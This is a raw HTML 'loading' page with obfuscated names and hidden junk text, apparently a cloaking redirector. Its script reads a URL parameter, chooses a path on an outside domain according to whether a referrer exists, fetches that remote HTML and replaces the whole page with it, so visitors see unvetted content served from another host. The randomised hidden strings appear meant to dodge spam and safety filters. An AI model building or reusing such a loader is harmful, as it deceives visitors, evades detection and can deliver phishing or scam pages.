<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EHZVkO00d26 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EHZVkO00d26 .dDJuhCkwTtS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EHZVkO00d26 .content {
            line-height: 50px;
            text-align: center
        }

        .EHZVkO00d26 .img {
            width: 100%
        }

        .EHZVkO00d26 .fIPjM5lo4 {
            text-align: center
        }

        .EHZVkO00d26 .fIPjM5lo4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EHZVkO00d26 .fIPjM5lo4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EHZVkO00d26 .fIPjM5lo4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EHZVkO00d26 .fIPjM5lo4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EHZVkO00d26 .fIPjM5lo4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EHZVkO00d26 .fIPjM5lo4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EHZVkO00d26 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function siPGFtZOpq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IZDIY = siPGFtZOpq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IZDIY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IZDIY +".html?a=share";
		}
		
        Slr1Z6I=url+"#"+new Date().getTime();
        Slr1Z6I && function() {
            $.get(Slr1Z6I, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>xClQkDghcooiljzeXyA9oSX2N9Zy2VznWe7ZO0nZnmokMEKvNyu1ZiR0HpxLjcXBXcdzPfAg04eRlkWOYbpukXTfUMbf6</a>
<p  style='display:none'>F6zxTyV4ZF4yLDQ47gzZ45sPY9fxBe9HDXVcAsRCoxXSPpsEVzHZ7AKVIScr1nykkINhZXUvcRhCK0vac49t0JbmG6</p>
<p  style='display:none'>F6zxTyV4ZF4yLDQ47gzZ45sPY9fxBe9HDXVcAsRCoxXSPpsEVzHZ7AKVIScr1nykkINhZXUvcRhCK0vac49t0JbmG6</p>
<ul style='display:none' >iw4hVMp47n4WAjffeoNtEQ4uWwsJ79rTY</ul>
<span style='display:none'>ur0kKo2UTcznAwz9KPDYcuWq2m4WM1YqYiuU82SkccdCrBEuTmoT1tcC</span><div class="EHZVkO00d26">
    <div class="dDJuhCkwTtS">
        <div class="fIPjM5lo4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ZTJHvIjp3sbYiY2mH3rlBKY4X0cSQZ0e1ISQsGoq3LJlBWGXuezlkEHYR7b134Y3NcdE5aIeg2d8ipkg5ioHXah5S</a>
<img  src='' style='display:none'>
<p  style='display:none'>T2EnfqDmePLzzxQXV4nOinv</p></body>
</html>